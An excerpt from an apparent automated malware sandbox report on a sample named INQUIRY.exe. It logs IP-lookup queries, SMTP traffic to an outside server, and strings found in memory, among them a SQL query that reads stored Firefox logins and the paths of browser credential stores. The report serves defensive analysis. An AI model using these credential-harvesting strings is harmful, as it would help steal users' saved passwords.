                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: global trafficTCP traffic: 192.168.2.4:49750 -> 166.62.27.57:587
                    Source: global trafficTCP traffic: 192.168.2.4:49750 -> 166.62.27.57:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 104.16.154.36 104.16.154.36
                    Source: Joe Sandbox ViewIP Address: 104.16.154.36 104.16.154.36
                    Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                    Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                    Source: global trafficTCP traffic: 192.168.2.4:49750 -> 166.62.27.57:587
                    Source: global trafficTCP traffic: 192.168.2.4:49750 -> 166.62.27.57:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmpString found in binary or memory: ttps://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4421591https://consent.google.com/about:blankhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.facebook.com (Facebook)
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmpString found in binary or memory: ttps://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4421591https://consent.google.com/about:blankhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.yahoo.com (Yahoo)
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmpString found in binary or memory: ttps://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4421591https://consent.google.com/about:blankhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.facebook.com (Facebook)
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmpString found in binary or memory: ttps://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4421591https://consent.google.com/about:blankhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.yahoo.com (Yahoo)
                    Source: unknownDNS traffic detected: queries for: 121.205.6.0.in-addr.arpa
                    Source: unknownDNS traffic detected: queries for: 121.205.6.0.in-addr.arpa
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                    Source: INQUIRY.exe, 00000001.00000003.656578776.0000000004FED000.00000004.00000001.sdmpString found in binary or memory: http://en.w
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.LinkId=42127
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com
                    Source: INQUIRY.exe, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                    Source: INQUIRY.exe, 00000001.00000003.659052456.0000000005013000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.659667033.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: INQUIRY.exe, 00000001.00000003.659667033.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661195055.0000000005011000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                    Source: INQUIRY.exe, 00000001.00000003.659571445.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com$p
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com0p
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comMic
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC(
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTCE
                    Source: INQUIRY.exe, 00000001.00000003.660352640.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comandh
                    Source: INQUIRY.exe, 00000001.00000003.659772843.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comits
                    Source: INQUIRY.exe, 00000001.00000003.659772843.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: INQUIRY.exe, 00000001.00000003.660352640.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comle
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660006267.0000000004FF6000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comn
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comsm
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comtig
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: INQUIRY.exe, 00000001.00000003.664630621.000000000501B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: INQUIRY.exe, 00000001.00000003.664546236.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlu
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: INQUIRY.exe, 00000001.00000003.662998950.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersd
                    Source: INQUIRY.exe, 00000001.00000003.663957016.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designershq
                    Source: INQUIRY.exe, 00000001.00000003.664066811.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerslb
